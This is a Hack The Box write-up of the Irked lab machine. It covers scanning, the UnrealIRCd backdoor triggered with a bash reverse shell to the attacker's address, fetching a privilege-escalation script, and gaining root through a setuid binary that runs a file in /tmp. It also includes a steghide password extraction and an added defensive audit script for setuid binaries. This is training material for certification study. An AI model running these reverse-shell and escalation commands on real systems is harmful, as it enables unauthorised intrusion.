Hack The Box: Irked Write-up (#16)

Joshua Surendran
7 min read · Aug 31, 2020

This is my 16th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. For most of the write-ups I get help from watching Ippsec’s YouTube videos and reading Rana Khalil’s write-ups. Please feel free to check them out. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.117
  • -sC: Default Nmap scripts
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535

We get back the following result:

  • Port 22: — Running SSH service, OpenSSH 6.7p1 Debian
  • Port 80: — Running HTTP service, Apache httpd 2.4.10 ((Debian))
  • Port 111, 37594: — Running rpcbind service
  • Port 6697, 8067, 65534: — Running IRC service
Nmap scan report for ip-10-10-10-117.ap-southeast-1.compute.internal (10.10.10.117)
Host is up (0.0084s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33428/udp status
| 100024 1 37594/tcp status
| 100024 1 44737/tcp6 status
|_ 100024 1 49480/udp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
37594/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd

For the UDP scan, I scanned the top 100 ports with the --top-ports flag because I had already rooted this box while the full UDP scan was still running.

nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.117
  • -sU: UDP scan

We get back the following results.

  • Port 111: — Running rpcbind service
  • Port 5353: — Running zeroconf
Nmap scan report for ip-10-10-10-117.ap-southeast-1.compute.internal (10.10.10.117)
Host is up (0.0093s latency).
Not shown: 90 closed ports
PORT STATE SERVICE
111/udp open rpcbind
631/udp open|filtered ipp
1025/udp open|filtered blackjack
1028/udp open|filtered ms-lsa
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
5353/udp open zeroconf
17185/udp open|filtered wdbrpc
49186/udp open|filtered unknown
49201/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

Before we begin enumeration, let’s make some quick mental notes:

  1. Port 22 (OpenSSH 6.7p1) and port 111 (rpcbind) don’t seem promising.
  2. Ports 6697, 8067 and 65534 are running UnrealIRCd. A quick Google search for this service reveals that UnrealIRCd version 3.2.8.1 is vulnerable to a backdoor. We are not sure which version this box runs, but we can enumerate to confirm it.

Service Enumeration

Port 80 (HTTP)

Visit the page.

Just an image. Check the page source.

Nothing interesting here. Let’s run a dirsearch.

python3 /opt/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.117/ -e txt -x 404,403

We get back the following results.

...SNIP...
Output File: /opt/dirsearch/reports/10.10.10.117/20-08-31_15-45-19

[15:45:19] Starting: 
[15:45:19] 200 - 72B - /
[15:45:20] 301 - 313B - /manual -> http://10.10.10.117/manual/

Task Completed

Let’s visit /manual/.

It is just an index page.

Ports 6697, 8067 and 65534 (UnrealIRCd)

Let’s run the Nmap script irc-unrealircd-backdoor to find which ports are vulnerable to the backdoor.

nmap --script=irc-unrealircd-backdoor -p6697,8067,65534 10.10.10.117

We get back the following results.

Ports 6697 and 8067 are vulnerable to the backdoor. The Nmap site provides steps to test the backdoor using the same script. Let’s try it out in the next phase.

Exploitation

We test port 6697 first. Start a Netcat listener on our Kali Linux machine.

root@kali:~# nc -nlvp 53
listening on [any] 53 ...

Then run the Nmap script with the following command.

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='bash -c "bash -i >& /dev/tcp/10.10.14.10/53 0>&1"' 10.10.10.117

We get a reverse shell.

Let’s upgrade the shell to a fully interactive shell with Python.

python -c 'import pty;pty.spawn("/bin/bash")'

Then press CTRL+Z on your keyboard. After that, type the following command.

stty raw -echo;fg

And press the Enter key twice. Next, we set the environment variable TERM to xterm, which lets us clear the screen, with the following command.

export TERM=xterm

Press Enter. Let’s move on to post-exploitation enumeration.

Post-Exploitation Enumeration

Let’s find the user.txt file.

ircd@irked:~/Unreal3.2$ find / -name user.txt -type f 2>/dev/null
/home/djmardov/Documents/user.txt
ircd@irked:~/Unreal3.2$ ls -l /home/djmardov/Documents/user.txt
-rw------- 1 djmardov djmardov 33 May 15 2018 /home/djmardov/Documents/user.txt

The file is under djmardov’s home directory and only that user can read it, so we need to escalate privileges.

Let’s download and run the lse.sh script on the target machine. First, start a Python web server in the directory where your lse.sh script resides.

root@kali:/opt/LinEnum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

From the target machine, download the file.

ircd@irked:/tmp$ wget http://10.10.14.10/lse.sh
--2020-08-31 07:31:51-- http://10.10.14.10/lse.sh
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘lse.sh’
lse.sh 100%[=====================>] 45.54K --.-KB/s in 0.02s

2020-08-31 07:31:51 (2.67 MB/s) - ‘lse.sh’ saved [46631/46631]

Execute the script.

bash lse.sh -l 1 -i
  • -l: Level of detail
  • -i: Non-interactive mode

After reviewing the long output from the script, we noticed the following file, /usr/bin/viewuser, which has the SUID bit set.

Let’s check the file type.

ircd@irked:/tmp$ file /usr/bin/viewuser 
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

It is a 32-bit setuid ELF binary. Let’s run it and see what it does.

ircd@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-08-31 02:20 (:0)
sh: 1: /tmp/listusers: not found

It seems to be looking for a listusers file under /tmp, but it’s not there. Let’s analyse this binary with the ltrace command on our Kali Linux machine to understand more.

Convert the file into base64 format.

base64 -w0 /usr/bin/viewuser

Copy the output and save it in a file on Kali Linux.

Then decode it back into the viewuser binary and give it execute permission.

base64 -d base64.txt > viewuser; chmod +x viewuser

Analyse with ltrace command.

root@kali:/htb/Irked# ltrace ./viewuser 
__libc_start_main(0x565da57d, 1, 0xffaaad84, 0x565da600 <unfinished ...>
puts("This application is being devleo"...This application is being devleoped to set and test user permissions
) = 69
puts("It is still being actively devel"...It is still being actively developed
) = 37
system("who"joshuaspy :0 2020-08-28 10:04 (:0)
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
setuid(0) = 0
system("/tmp/listusers"sh: 1: /tmp/listusers: not found
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 32512
+++ exited (status 0) +++

The binary calls setuid(0), which gives it root privileges because it is setuid root, and then calls system("/tmp/listusers"); that fails because the file is not there. Since /tmp is world-writable, anyone can supply that file. Great! We can create our payload and place it under the /tmp directory.
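The root cause is a setuid binary that executes a fixed path under the world-writable /tmp. The audit script below is an added example, not part of the original write-up or the box: it walks a host for setuid/setgid binaries and reports any that embed a path under /tmp, /var/tmp or /dev/shm, so an administrator can catch this pattern before it is abused. The directory list and function names are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the write-up): audit setuid/setgid binaries for
# embedded paths under world-writable directories, the pattern behind
# /usr/bin/viewuser calling system("/tmp/listusers") as root.
# The directory list and function names are this example's own choices.

# Print every path under a world-writable directory embedded in FILE, one per
# line. grep -a scans the binary as text and -o prints only the matched path.
writable_dir_refs() {
    grep -aoE '/(tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+' "$1" 2>/dev/null | sort -u
}

# Succeed (exit 0) when FILE references at least one such path.
has_writable_dir_ref() {
    [ -n "$(writable_dir_refs "$1")" ]
}

# Walk ROOT (default /) for setuid/setgid regular files and print each risky
# binary followed by the paths it references, indented with "->".
audit_suid_binaries() {
    root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r bin; do
        if has_writable_dir_ref "$bin"; then
            printf '%s\n' "$bin"
            writable_dir_refs "$bin" | sed 's/^/    -> /'
        fi
    done
}

# When run directly with a directory argument, audit that tree.
if [ "$#" -gt 0 ]; then
    audit_suid_binaries "$1"
fi
```

A hit only means the path is embedded somewhere in the binary; confirm with ltrace or strace, as done above, that it is actually executed with elevated privileges.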

Privilege Escalation

Let’s create a listusers shell script with the following contents.

root@irked:/tmp# cat listusers 
#!/bin/bash
bash

Give execute permission.

chmod +x listusers

Then run the viewuser binary.

We are rooted.

Grab the user.txt flag.

Grab the root.txt flag.

Extra Contents

I learned another approach to escalate privileges to djmardov from Ippsec’s video on this box. It uses a steganography method. There is a .backup file under the /home/djmardov/Documents/ directory.

The password “UPupDOWNdownLRlrBAbaSSss” is used to extract the message or data hidden in the image file. In this case, the image file is irked.jpg. First, install the steghide steganography tool on Kali Linux.

apt install steghide

Next, download the image file to Kali Linux.

wget http://10.10.10.117/irked.jpg

Run the tool to get the hidden message.

steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss

We get the hidden message, which is djmardov’s SSH password.

Let’s SSH to the target as user djmardov.

ssh djmardov@10.10.10.117

Now we have djmardov’s privileges. From here we can escalate to root by exploiting the SUID misconfiguration as we did earlier.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Friendzone.
